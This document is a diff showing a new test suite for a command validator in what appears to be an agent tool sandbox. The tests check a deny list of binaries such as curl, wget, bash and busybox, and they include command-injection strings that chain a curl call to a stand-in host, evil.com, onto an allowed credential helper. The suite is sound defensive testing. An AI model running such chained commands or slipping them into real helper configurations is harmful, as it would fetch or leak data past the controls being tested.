package/node_modules/zod/v4/locales/az.js +105 -0
package/node_modules/zod/v4/locales/be.cjs +183 -0
package/node_modules/zod/v4/locales/be.d.cts +5 -0
package/node_modules/zod/v4/locales/be.d.ts +4 -0
package/node_modules/zod/v4/locales/be.js +156 -0
package/node_modules/zod/v4/locales/bg.cjs +147 -0
package/node_modules/zod/v4/locales/bg.d.cts +5 -0
package/node_modules/zod/v4/locales/bg.d.ts +4 -0
package/node_modules/zod/v4/locales/bg.js +120 -0
package/node_modules/zod/v4/locales/ca.cjs +134 -0
package/node_modules/zod/v4/locales/ca.d.cts +5 -0
package/node_modules/zod/v4/locales/ca.d.ts +4 -0
package/node_modules/zod/v4/locales/ca.js +107 -0
package/node_modules/zod/v4/locales/cs.cjs +138 -0
package/node_modules/zod/v4/locales/cs.d.cts +5 -0
package/node_modules/zod/v4/locales/cs.d.ts +4 -0
package/node_modules/zod/v4/locales/cs.js +111 -0
package/node_modules/zod/v4/locales/da.cjs +142 -0
package/node_modules/zod/v4/locales/da.d.cts +5 -0
package/node_modules/zod/v4/locales/da.d.ts +4 -0
package/node_modules/zod/v4/locales/da.js +115 -0
package/node_modules/zod/v4/locales/de.cjs +135 -0
package/node_modules/zod/v4/locales/de.d.cts +5 -0
package/node_modules/zod/v4/locales/de.d.ts +4 -0
package/node_modules/zod/v4/locales/de.js +108 -0
package/node_modules/zod/v4/locales/en.cjs +136 -0
package/node_modules/zod/v4/locales/en.d.cts +5 -0
package/node_modules/zod/v4/locales/en.d.ts +4 -0
package/node_modules/zod/v4/locales/en.js +109 -0
package/node_modules/zod/v4/locales/eo.cjs +136 -0
package/node_modules/zod/v4/locales/eo.d.cts +5 -0
package/node_modules/zod/v4/locales/eo.d.ts +4 -0
package/node_modules/zod/v4/locales/eo.js +109 -0
package/node_modules/zod/v4/locales/es.cjs +159 -0
package/node_modules/zod/v4/locales/es.d.cts +5 -0
package/node_modules/zod/v4/locales/es.d.ts +4 -0
package/node_modules/zod/v4/locales/es.js +132 -0
package/node_modules/zod/v4/locales/fa.cjs +141 -0
package/node_modules/zod/v4/locales/fa.d.cts +5 -0
package/node_modules/zod/v4/locales/fa.d.ts +4 -0
package/node_modules/zod/v4/locales/fa.js +114 -0
package/node_modules/zod/v4/locales/fi.cjs +139 -0
package/node_modules/zod/v4/locales/fi.d.cts +5 -0
package/node_modules/zod/v4/locales/fi.d.ts +4 -0
package/node_modules/zod/v4/locales/fi.js +112 -0
package/node_modules/zod/v4/locales/fr-CA.cjs +134 -0
package/node_modules/zod/v4/locales/fr-CA.d.cts +5 -0
package/node_modules/zod/v4/locales/fr-CA.d.ts +4 -0
package/node_modules/zod/v4/locales/fr-CA.js +107 -0
package/node_modules/zod/v4/locales/fr.cjs +135 -0
package/node_modules/zod/v4/locales/fr.d.cts +5 -0
package/node_modules/zod/v4/locales/fr.d.ts +4 -0
package/node_modules/zod/v4/locales/fr.js +108 -0
package/node_modules/zod/v4/locales/he.cjs +241 -0
package/node_modules/zod/v4/locales/he.d.cts +5 -0
package/node_modules/zod/v4/locales/he.d.ts +4 -0
package/node_modules/zod/v4/locales/he.js +214 -0
package/node_modules/zod/v4/locales/hu.cjs +135 -0
package/node_modules/zod/v4/locales/hu.d.cts +5 -0
package/node_modules/zod/v4/locales/hu.d.ts +4 -0
package/node_modules/zod/v4/locales/hu.js +108 -0
package/node_modules/zod/v4/locales/hy.cjs +174 -0
package/node_modules/zod/v4/locales/hy.d.cts +5 -0
package/node_modules/zod/v4/locales/hy.d.ts +4 -0
package/node_modules/zod/v4/locales/hy.js +147 -0
package/node_modules/zod/v4/locales/id.cjs +133 -0
package/node_modules/zod/v4/locales/id.d.cts +5 -0
package/node_modules/zod/v4/locales/id.d.ts +4 -0
package/node_modules/zod/v4/locales/id.js +106 -0
package/node_modules/zod/v4/locales/index.cjs +104 -0
package/node_modules/zod/v4/locales/index.d.cts +49 -0
package/node_modules/zod/v4/locales/index.d.ts +49 -0
package/node_modules/zod/v4/locales/index.js +49 -0
package/node_modules/zod/v4/locales/is.cjs +136 -0
package/node_modules/zod/v4/locales/is.d.cts +5 -0
package/node_modules/zod/v4/locales/is.d.ts +4 -0
package/node_modules/zod/v4/locales/is.js +109 -0
package/node_modules/zod/v4/locales/it.cjs +135 -0
package/node_modules/zod/v4/locales/it.d.cts +5 -0
package/node_modules/zod/v4/locales/it.d.ts +4 -0
package/node_modules/zod/v4/locales/it.js +108 -0
package/node_modules/zod/v4/locales/ja.cjs +134 -0
package/node_modules/zod/v4/locales/ja.d.cts +5 -0
package/node_modules/zod/v4/locales/ja.d.ts +4 -0
package/node_modules/zod/v4/locales/ja.js +107 -0
package/node_modules/zod/v4/locales/ka.cjs +139 -0
package/node_modules/zod/v4/locales/ka.d.cts +5 -0
package/node_modules/zod/v4/locales/ka.d.ts +4 -0
package/node_modules/zod/v4/locales/ka.js +112 -0
package/node_modules/zod/v4/locales/kh.cjs +12 -0
package/node_modules/zod/v4/locales/kh.d.cts +5 -0
package/node_modules/zod/v4/locales/kh.d.ts +5 -0
package/node_modules/zod/v4/locales/kh.js +5 -0
package/node_modules/zod/v4/locales/km.cjs +137 -0
package/node_modules/zod/v4/locales/km.d.cts +5 -0
package/node_modules/zod/v4/locales/km.d.ts +4 -0
package/node_modules/zod/v4/locales/km.js +110 -0
package/node_modules/zod/v4/locales/ko.cjs +138 -0
package/node_modules/zod/v4/locales/ko.d.cts +5 -0
package/node_modules/zod/v4/locales/ko.d.ts +4 -0
package/node_modules/zod/v4/locales/ko.js +111 -0
package/node_modules/zod/v4/locales/lt.cjs +230 -0
package/node_modules/zod/v4/locales/lt.d.cts +5 -0
package/node_modules/zod/v4/locales/lt.d.ts +4 -0
package/node_modules/zod/v4/locales/lt.js +203 -0
package/node_modules/zod/v4/locales/mk.cjs +136 -0
package/node_modules/zod/v4/locales/mk.d.cts +5 -0
package/node_modules/zod/v4/locales/mk.d.ts +4 -0
package/node_modules/zod/v4/locales/mk.js +109 -0
package/node_modules/zod/v4/locales/ms.cjs +134 -0
package/node_modules/zod/v4/locales/ms.d.cts +5 -0
package/node_modules/zod/v4/locales/ms.d.ts +4 -0
package/node_modules/zod/v4/locales/ms.js +107 -0
package/node_modules/zod/v4/locales/nl.cjs +137 -0
package/node_modules/zod/v4/locales/nl.d.cts +5 -0
package/node_modules/zod/v4/locales/nl.d.ts +4 -0
package/node_modules/zod/v4/locales/nl.js +110 -0
package/node_modules/zod/v4/locales/no.cjs +135 -0
package/node_modules/zod/v4/locales/no.d.cts +5 -0
package/node_modules/zod/v4/locales/no.d.ts +4 -0
package/node_modules/zod/v4/locales/no.js +108 -0
package/node_modules/zod/v4/locales/ota.cjs +136 -0
package/node_modules/zod/v4/locales/ota.d.cts +5 -0
package/node_modules/zod/v4/locales/ota.d.ts +4 -0
package/node_modules/zod/v4/locales/ota.js +109 -0
package/node_modules/zod/v4/locales/package.json +6 -0
package/node_modules/zod/v4/locales/pl.cjs +136 -0
package/node_modules/zod/v4/locales/pl.d.cts +5 -0
package/node_modules/zod/v4/locales/pl.d.ts +4 -0
package/node_modules/zod/v4/locales/pl.js +109 -0
package/node_modules/zod/v4/locales/ps.cjs +141 -0
package/node_modules/zod/v4/locales/ps.d.cts +5 -0
package/node_modules/zod/v4/locales/ps.d.ts +4 -0
package/node_modules/zod/v4/locales/ps.js +114 -0
package/node_modules/zod/v4/locales/pt.cjs +135 -0
package/node_modules/zod/v4/locales/pt.d.cts +5 -0
package/node_modules/zod/v4/locales/pt.d.ts +4 -0
package/node_modules/zod/v4/locales/pt.js +108 -0
package/node_modules/zod/v4/locales/ru.cjs +183 -0
package/node_modules/zod/v4/locales/ru.d.cts +5 -0
package/node_modules/zod/v4/locales/ru.d.ts +4 -0
package/node_modules/zod/v4/locales/ru.js +156 -0
package/node_modules/zod/v4/locales/sl.cjs +136 -0
package/node_modules/zod/v4/locales/sl.d.cts +5 -0
package/node_modules/zod/v4/locales/sl.d.ts +4 -0
package/node_modules/zod/v4/locales/sl.js +109 -0
package/node_modules/zod/v4/locales/sv.cjs +137 -0
package/node_modules/zod/v4/locales/sv.d.cts +5 -0
package/node_modules/zod/v4/locales/sv.d.ts +4 -0
package/node_modules/zod/v4/locales/sv.js +110 -0
package/node_modules/zod/v4/locales/ta.cjs +137 -0
package/node_modules/zod/v4/locales/ta.d.cts +5 -0
package/node_modules/zod/v4/locales/ta.d.ts +4 -0
package/node_modules/zod/v4/locales/ta.js +110 -0
package/node_modules/zod/v4/locales/th.cjs +137 -0
package/node_modules/zod/v4/locales/th.d.cts +5 -0
package/node_modules/zod/v4/locales/th.d.ts +4 -0
package/node_modules/zod/v4/locales/th.js +110 -0
package/node_modules/zod/v4/locales/tr.cjs +132 -0
package/node_modules/zod/v4/locales/tr.d.cts +5 -0
package/node_modules/zod/v4/locales/tr.d.ts +4 -0
package/node_modules/zod/v4/locales/tr.js +105 -0
package/node_modules/zod/v4/locales/ua.cjs +12 -0
package/node_modules/zod/v4/locales/ua.d.cts +5 -0
package/node_modules/zod/v4/locales/ua.d.ts +5 -0
package/node_modules/zod/v4/locales/ua.js +5 -0
package/node_modules/zod/v4/locales/uk.cjs +135 -0
package/node_modules/zod/v4/locales/uk.d.cts +5 -0
package/node_modules/zod/v4/locales/uk.d.ts +4 -0
package/node_modules/zod/v4/locales/uk.js +108 -0
package/node_modules/zod/v4/locales/ur.cjs +137 -0
package/node_modules/zod/v4/locales/ur.d.cts +5 -0
package/node_modules/zod/v4/locales/ur.d.ts +4 -0
package/node_modules/zod/v4/locales/ur.js +110 -0
package/node_modules/zod/v4/locales/uz.cjs +136 -0
package/node_modules/zod/v4/locales/uz.d.cts +5 -0
package/node_modules/zod/v4/locales/uz.d.ts +4 -0
package/node_modules/zod/v4/locales/uz.js +109 -0
package/node_modules/zod/v4/locales/vi.cjs +135 -0
package/node_modules/zod/v4/locales/vi.d.cts +5 -0
package/node_modules/zod/v4/locales/vi.d.ts +4 -0
package/node_modules/zod/v4/locales/vi.js +108 -0
package/node_modules/zod/v4/locales/yo.cjs +134 -0
package/node_modules/zod/v4/locales/yo.d.cts +5 -0
package/node_modules/zod/v4/locales/yo.d.ts +4 -0
package/node_modules/zod/v4/locales/yo.js +107 -0
package/node_modules/zod/v4/locales/zh-CN.cjs +136 -0
package/node_modules/zod/v4/locales/zh-CN.d.cts +5 -0
package/node_modules/zod/v4/locales/zh-CN.d.ts +4 -0
package/node_modules/zod/v4/locales/zh-CN.js +109 -0
package/node_modules/zod/v4/locales/zh-TW.cjs +134 -0
package/node_modules/zod/v4/locales/zh-TW.d.cts +5 -0
package/node_modules/zod/v4/locales/zh-TW.d.ts +4 -0
package/node_modules/zod/v4/locales/zh-TW.js +107 -0
package/node_modules/zod/v4/mini/checks.cjs +34 -0
package/node_modules/zod/v4/mini/checks.d.cts +1 -0
package/node_modules/zod/v4/mini/checks.d.ts +1 -0
package/node_modules/zod/v4/mini/checks.js +1 -0
package/node_modules/zod/v4/mini/coerce.cjs +52 -0
package/node_modules/zod/v4/mini/coerce.d.cts +7 -0
package/node_modules/zod/v4/mini/coerce.d.ts +7 -0
package/node_modules/zod/v4/mini/coerce.js +22 -0
package/node_modules/zod/v4/mini/external.cjs +63 -0
package/node_modules/zod/v4/mini/external.d.cts +12 -0
package/node_modules/zod/v4/mini/external.d.ts +12 -0
package/node_modules/zod/v4/mini/external.js +14 -0
package/node_modules/zod/v4/mini/index.cjs +32 -0
package/node_modules/zod/v4/mini/index.d.cts +3 -0
package/node_modules/zod/v4/mini/index.d.ts +3 -0
package/node_modules/zod/v4/mini/index.js +3 -0
package/node_modules/zod/v4/mini/iso.cjs +64 -0
package/node_modules/zod/v4/mini/iso.d.cts +22 -0
package/node_modules/zod/v4/mini/iso.d.ts +22 -0
package/node_modules/zod/v4/mini/iso.js +34 -0
package/node_modules/zod/v4/mini/package.json +6 -0
package/node_modules/zod/v4/mini/parse.cjs +16 -0
package/node_modules/zod/v4/mini/parse.d.cts +1 -0
package/node_modules/zod/v4/mini/parse.d.ts +1 -0
package/node_modules/zod/v4/mini/parse.js +1 -0
package/node_modules/zod/v4/mini/schemas.cjs +1046 -0
package/node_modules/zod/v4/mini/schemas.d.cts +427 -0
package/node_modules/zod/v4/mini/schemas.d.ts +427 -0
package/node_modules/zod/v4/mini/schemas.js +925 -0
package/node_modules/zod/v4/package.json +6 -0
package/node_modules/zod/v4-mini/index.cjs +32 -0
package/node_modules/zod/v4-mini/index.d.cts +3 -0
package/node_modules/zod/v4-mini/index.d.ts +3 -0
package/node_modules/zod/v4-mini/index.js +3 -0
package/node_modules/zod/v4-mini/package.json +6 -0
package/package.json +3 -2
package/src/__tests__/command-executor.test.ts +575 -60
package/src/__tests__/command-validator.test.ts +697 -0
package/src/__tests__/command-workspace.test.ts +30 -0
package/src/__tests__/grant-store.test.ts +151 -33
package/src/__tests__/http-executor.test.ts +106 -16
package/src/__tests__/http-policy.test.ts +121 -22
package/src/__tests__/local-materializers.test.ts +34 -0
package/src/__tests__/managed-integration.test.ts +633 -0
package/src/__tests__/managed-lazy-getters.test.ts +245 -0
package/src/__tests__/managed-materializers.test.ts +107 -38
package/src/__tests__/managed-rejection.test.ts +43 -0
package/src/__tests__/toolstore.test.ts +207 -18
package/src/__tests__/transport.test.ts +26 -6
package/src/commands/auth-adapters.ts +2 -2
package/src/commands/egress-hooks.ts +203 -0
package/src/commands/executor.ts +403 -87
package/src/commands/profiles.ts +4 -0
package/src/commands/validator.ts +267 -3
package/src/commands/workspace.ts +59 -21
package/src/grants/index.ts +1 -1
package/src/grants/persistent-store.ts +79 -17
package/src/grants/rpc-handlers.ts +67 -43
package/src/grants/temporary-store.ts +26 -19
package/src/http/executor.ts +170 -25
package/src/http/path-template.ts +75 -9
package/src/http/policy.ts +9 -27
package/src/index.ts +3 -0
package/src/main.ts +102 -43
package/src/managed-errors.ts +9 -0
package/src/managed-lazy-getters.ts +70 -0
package/src/managed-main.ts +191 -65
package/src/materializers/local-oauth-lookup.ts +97 -0
package/src/materializers/local-secure-key-backend.ts +254 -0
package/src/materializers/local-token-refresh.ts +263 -0
package/src/materializers/local.ts +21 -5
package/src/materializers/managed-platform.ts +50 -25
package/src/paths.ts +28 -10
package/src/server.ts +147 -11
package/src/subjects/managed.ts +33 -12
package/src/subjects/policy.ts +79 -0
package/src/toolstore/publish.ts +236 -7

package/src/__tests__/command-validator.test.ts CHANGED Viewed

@@ -11,6 +11,8 @@ import {
   validateManifest,
   validateCommand,
   matchesArgvPattern,
+  extractShellBinary,
+  containsShellMetacharacters,
 } from "../commands/validator.js";
 // ---------------------------------------------------------------------------
@@ -138,6 +140,28 @@ describe("validateManifest", () => {
     expect(result.errors.some((e) => e.includes("env"))).toBe(true);
   });
+  test("rejects busybox as entrypoint", () => {
+    const result = validateManifest(
+      buildManifest({ entrypoint: "/usr/bin/busybox" }),
+    );
+    expect(result.valid).toBe(false);
+    expect(result.errors.some((e) => e.includes("busybox"))).toBe(true);
+    expect(
+      result.errors.some((e) => e.includes("structurally denied binary")),
+    ).toBe(true);
+  });
+  test("rejects toybox as entrypoint", () => {
+    const result = validateManifest(
+      buildManifest({ entrypoint: "/usr/bin/toybox" }),
+    );
+    expect(result.valid).toBe(false);
+    expect(result.errors.some((e) => e.includes("toybox"))).toBe(true);
+    expect(
+      result.errors.some((e) => e.includes("structurally denied binary")),
+    ).toBe(true);
+  });
   test("rejects bundleId matching a denied binary", () => {
     const result = validateManifest(
       buildManifest({
@@ -353,6 +377,165 @@ describe("validateManifest", () => {
     ).toBe(true);
   });
+  // -- Argv pattern tokens matching denied binaries --------------------------
+  test("rejects argv pattern with wget as a literal token", () => {
+    const result = validateManifest(
+      buildManifest({
+        commandProfiles: {
+          "download": {
+            description: "Download files",
+            allowedArgvPatterns: [
+              { name: "wget-url", tokens: ["wget", "<url>"] },
+            ],
+            deniedSubcommands: [],
+            allowedNetworkTargets: [
+              { hostPattern: "example.com", protocols: ["https"] },
+            ],
+          },
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes('"wget"') &&
+          e.includes("denied binary"),
+      ),
+    ).toBe(true);
+  });
+  test("rejects argv pattern with sh as a literal token (shell trampoline)", () => {
+    const result = validateManifest(
+      buildManifest({
+        commandProfiles: {
+          "shell": {
+            description: "Run shell command",
+            allowedArgvPatterns: [
+              { name: "shell-exec", tokens: ["sh", "-c", "<cmd>"] },
+            ],
+            deniedSubcommands: [],
+            allowedNetworkTargets: [
+              { hostPattern: "example.com", protocols: ["https"] },
+            ],
+          },
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes('"sh"') &&
+          e.includes("denied binary"),
+      ),
+    ).toBe(true);
+  });
+  test("rejects argv pattern with curl as a literal token", () => {
+    const result = validateManifest(
+      buildManifest({
+        commandProfiles: {
+          "fetch": {
+            description: "Fetch URL",
+            allowedArgvPatterns: [
+              { name: "curl-url", tokens: ["curl", "<url>"] },
+            ],
+            deniedSubcommands: [],
+            allowedNetworkTargets: [
+              { hostPattern: "example.com", protocols: ["https"] },
+            ],
+          },
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes('"curl"') &&
+          e.includes("denied binary"),
+      ),
+    ).toBe(true);
+  });
+  test("allows argv pattern with non-denied literal tokens", () => {
+    const result = validateManifest(
+      buildManifest({
+        commandProfiles: {
+          "api-read": {
+            description: "Read-only API calls",
+            allowedArgvPatterns: [
+              {
+                name: "api-get",
+                tokens: ["api", "<endpoint>", "--method", "GET"],
+              },
+            ],
+            deniedSubcommands: [],
+            allowedNetworkTargets: [
+              { hostPattern: "api.github.com", protocols: ["https"] },
+            ],
+          },
+        },
+      }),
+    );
+    expect(result.valid).toBe(true);
+  });
+  test("does not flag placeholder tokens as denied binaries", () => {
+    // Placeholders like <url> should not be checked against the denylist
+    const result = validateManifest(
+      buildManifest({
+        commandProfiles: {
+          "api-read": {
+            description: "Read-only API calls",
+            allowedArgvPatterns: [
+              {
+                name: "api-get",
+                tokens: ["api", "<endpoint>", "<args...>"],
+              },
+            ],
+            deniedSubcommands: [],
+            allowedNetworkTargets: [
+              { hostPattern: "api.github.com", protocols: ["https"] },
+            ],
+          },
+        },
+      }),
+    );
+    expect(result.valid).toBe(true);
+  });
+  test("allows denied binary names in non-executable argv positions", () => {
+    // Names like "https", "exec", "http" overlap with DENIED_BINARIES but
+    // are valid argument values when not in the first (executable) position.
+    const result = validateManifest(
+      buildManifest({
+        commandProfiles: {
+          "connect": {
+            description: "Connect with scheme",
+            allowedArgvPatterns: [
+              {
+                name: "connect-https",
+                tokens: ["connect", "--scheme", "https"],
+              },
+              {
+                name: "run-mode",
+                tokens: ["run", "--mode", "exec", "<target>"],
+              },
+            ],
+            deniedSubcommands: [],
+            allowedNetworkTargets: [
+              { hostPattern: "example.com", protocols: ["https"] },
+            ],
+          },
+        },
+      }),
+    );
+    expect(result.valid).toBe(true);
+  });
   // -- Auth adapter validation -----------------------------------------------
   test("rejects auth adapter with empty envVarName", () => {
@@ -466,6 +649,13 @@ describe("isDeniedBinary", () => {
     expect(isDeniedBinary("php")).toBe(true);
   });
+  test("denies multi-call umbrella binaries", () => {
+    expect(isDeniedBinary("busybox")).toBe(true);
+    expect(isDeniedBinary("toybox")).toBe(true);
+    expect(isDeniedBinary("/usr/bin/busybox")).toBe(true);
+    expect(isDeniedBinary("/usr/bin/toybox")).toBe(true);
+  });
   test("denies shell trampolines", () => {
     expect(isDeniedBinary("bash")).toBe(true);
     expect(isDeniedBinary("sh")).toBe(true);
@@ -614,6 +804,45 @@ describe("validateCommand", () => {
     expect(result.reason).toContain("--unsafe-perm");
   });
+  test("denies --flag=value form of denied flags", () => {
+    const manifestWithDeniedFlags = buildManifest({
+      commandProfiles: {
+        "api-read": {
+          description: "Read-only GitHub API calls",
+          allowedArgvPatterns: [
+            {
+              name: "api-call",
+              tokens: ["api", "<endpoint>", "<args...>"],
+            },
+          ],
+          deniedSubcommands: [],
+          deniedFlags: ["--endpoint-url", "--exec"],
+          allowedNetworkTargets: [
+            { hostPattern: "api.github.com", protocols: ["https"] },
+          ],
+        },
+      },
+    });
+    // --flag=value combined form should be caught
+    const result = validateCommand(manifestWithDeniedFlags, [
+      "api",
+      "/repos",
+      "--endpoint-url=https://evil.example.com",
+    ]);
+    expect(result.allowed).toBe(false);
+    expect(result.reason).toContain("--endpoint-url");
+    // --flag value (separate tokens) should still be caught
+    const result2 = validateCommand(manifestWithDeniedFlags, [
+      "api",
+      "/repos",
+      "--exec",
+    ]);
+    expect(result2.allowed).toBe(false);
+    expect(result2.reason).toContain("--exec");
+  });
   // -- Multi-profile matching ------------------------------------------------
   test("matches across multiple profiles", () => {
@@ -660,6 +889,246 @@ describe("validateCommand", () => {
   });
 });
+// ---------------------------------------------------------------------------
+// credential_process helperCommand denied binary validation
+// ---------------------------------------------------------------------------
+describe("credential_process helperCommand denied binary validation", () => {
+  test("rejects helperCommand starting with curl", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "curl http://example.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes("credential_process") &&
+          e.includes("denied binary") &&
+          e.includes('"curl"'),
+      ),
+    ).toBe(true);
+  });
+  test("rejects helperCommand with absolute path to denied binary (python3)", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "/usr/bin/python3 script.py",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes("credential_process") &&
+          e.includes("denied binary") &&
+          e.includes('"python3"'),
+      ),
+    ).toBe(true);
+  });
+  test("rejects helperCommand starting with bash", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "bash -c 'echo test'",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes("credential_process") &&
+          e.includes("denied binary") &&
+          e.includes('"bash"'),
+      ),
+    ).toBe(true);
+  });
+  test("accepts helperCommand with allowed binary (aws-vault)", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default --json",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(true);
+    expect(result.errors).toHaveLength(0);
+  });
+  // -- Shell semantics bypass prevention ------------------------------------
+  test("rejects single-quoted denied binary ('curl')", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "'curl' https://example.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes("credential_process") &&
+          e.includes("denied binary") &&
+          e.includes('"curl"'),
+      ),
+    ).toBe(true);
+  });
+  test("rejects double-quoted denied binary (\"curl\")", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: '"curl" https://example.com',
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes("credential_process") &&
+          e.includes("denied binary") &&
+          e.includes('"curl"'),
+      ),
+    ).toBe(true);
+  });
+  test("rejects denied binary after env var assignment (AWS_PROFILE=x curl)", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "AWS_PROFILE=x curl https://example.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes("credential_process") &&
+          e.includes("denied binary") &&
+          e.includes('"curl"'),
+      ),
+    ).toBe(true);
+  });
+  test("rejects denied binary after multiple env var assignments", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "AWS_PROFILE=default FOO=bar python3 script.py",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes("credential_process") &&
+          e.includes("denied binary") &&
+          e.includes('"python3"'),
+      ),
+    ).toBe(true);
+  });
+  test("rejects denied binary with env assignment and quotes combined", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "AWS_PROFILE='prod' 'bash' -c 'echo creds'",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some(
+        (e) =>
+          e.includes("credential_process") &&
+          e.includes("denied binary") &&
+          e.includes('"bash"'),
+      ),
+    ).toBe(true);
+  });
+});
+// ---------------------------------------------------------------------------
+// extractShellBinary
+// ---------------------------------------------------------------------------
+describe("extractShellBinary", () => {
+  test("extracts plain binary name", () => {
+    expect(extractShellBinary("curl https://example.com")).toBe("curl");
+  });
+  test("extracts absolute path binary", () => {
+    expect(extractShellBinary("/usr/bin/python3 script.py")).toBe("/usr/bin/python3");
+  });
+  test("strips single quotes from binary", () => {
+    expect(extractShellBinary("'curl' https://example.com")).toBe("curl");
+  });
+  test("strips double quotes from binary", () => {
+    expect(extractShellBinary('"curl" https://example.com')).toBe("curl");
+  });
+  test("skips single env var assignment", () => {
+    expect(extractShellBinary("AWS_PROFILE=x curl https://example.com")).toBe("curl");
+  });
+  test("skips multiple env var assignments", () => {
+    expect(extractShellBinary("AWS_PROFILE=default FOO=bar curl https://example.com")).toBe("curl");
+  });
+  test("skips env var assignment with quoted value", () => {
+    expect(extractShellBinary("AWS_PROFILE='prod' curl https://example.com")).toBe("curl");
+  });
+  test("skips env var assignment with double-quoted value", () => {
+    expect(extractShellBinary('AWS_PROFILE="prod account" curl https://example.com')).toBe("curl");
+  });
+  test("handles env assignment + quoted binary combined", () => {
+    expect(extractShellBinary("AWS_PROFILE='prod' 'bash' -c 'echo test'")).toBe("bash");
+  });
+  test("handles binary with no arguments", () => {
+    expect(extractShellBinary("aws-vault")).toBe("aws-vault");
+  });
+  test("handles leading whitespace", () => {
+    expect(extractShellBinary("  curl https://example.com")).toBe("curl");
+  });
+});
 // ---------------------------------------------------------------------------
 // Comprehensive denied binary coverage
 // ---------------------------------------------------------------------------
@@ -687,6 +1156,12 @@ describe("DENIED_BINARIES set", () => {
     }
   });
+  test("contains all expected multi-call umbrella binaries", () => {
+    for (const binary of ["busybox", "toybox"]) {
+      expect(DENIED_BINARIES.has(binary)).toBe(true);
+    }
+  });
   test("contains all expected shell trampolines", () => {
     for (const binary of [
       "bash",
@@ -706,3 +1181,225 @@ describe("DENIED_BINARIES set", () => {
     }
   });
 });
+// ---------------------------------------------------------------------------
+// extractShellBinary: backslash-escaped spaces in env assignments
+// ---------------------------------------------------------------------------
+describe("extractShellBinary — escaped spaces in env assignments", () => {
+  test("handles backslash-escaped space in bare env value", () => {
+    // AWS_PROFILE=prod\ account curl ... should parse as binary "curl",
+    // not "account" (the escaped space is part of the value).
+    expect(extractShellBinary("AWS_PROFILE=prod\\ account curl https://example.com")).toBe("curl");
+  });
+  test("handles multiple backslash-escaped spaces in bare env value", () => {
+    expect(extractShellBinary("FOO=a\\ b\\ c curl https://example.com")).toBe("curl");
+  });
+  test("handles backslash-escaped character in bare env value (no space)", () => {
+    expect(extractShellBinary("FOO=bar\\nbaz curl https://example.com")).toBe("curl");
+  });
+  test("still works with unescaped bare values", () => {
+    expect(extractShellBinary("AWS_PROFILE=prod curl https://example.com")).toBe("curl");
+  });
+});
+// ---------------------------------------------------------------------------
+// containsShellMetacharacters
+// ---------------------------------------------------------------------------
+describe("containsShellMetacharacters", () => {
+  test("detects semicolon", () => {
+    expect(containsShellMetacharacters("aws-vault exec; curl http://evil.com")).toBe(true);
+  });
+  test("detects &&", () => {
+    expect(containsShellMetacharacters("aws-vault exec && curl http://evil.com")).toBe(true);
+  });
+  test("detects ||", () => {
+    expect(containsShellMetacharacters("aws-vault exec || curl http://evil.com")).toBe(true);
+  });
+  test("detects single pipe", () => {
+    expect(containsShellMetacharacters("aws-vault exec | curl http://evil.com")).toBe(true);
+  });
+  test("detects $() command substitution", () => {
+    expect(containsShellMetacharacters("aws-vault exec $(curl http://evil.com)")).toBe(true);
+  });
+  test("detects backtick command substitution", () => {
+    expect(containsShellMetacharacters("aws-vault exec `curl http://evil.com`")).toBe(true);
+  });
+  test("detects newline (command separator)", () => {
+    expect(containsShellMetacharacters("aws-vault exec default\ncurl http://evil.com")).toBe(true);
+  });
+  test("detects carriage return", () => {
+    expect(containsShellMetacharacters("aws-vault exec default\rcurl http://evil.com")).toBe(true);
+  });
+  test("allows clean commands without metacharacters", () => {
+    expect(containsShellMetacharacters("aws-vault exec default --json")).toBe(false);
+  });
+  test("allows flags with dashes and equals", () => {
+    expect(containsShellMetacharacters("/usr/local/bin/aws-vault exec prod --format=json")).toBe(false);
+  });
+  test("allows env var assignments", () => {
+    expect(containsShellMetacharacters("AWS_PROFILE=prod aws-vault exec default")).toBe(false);
+  });
+});
+// ---------------------------------------------------------------------------
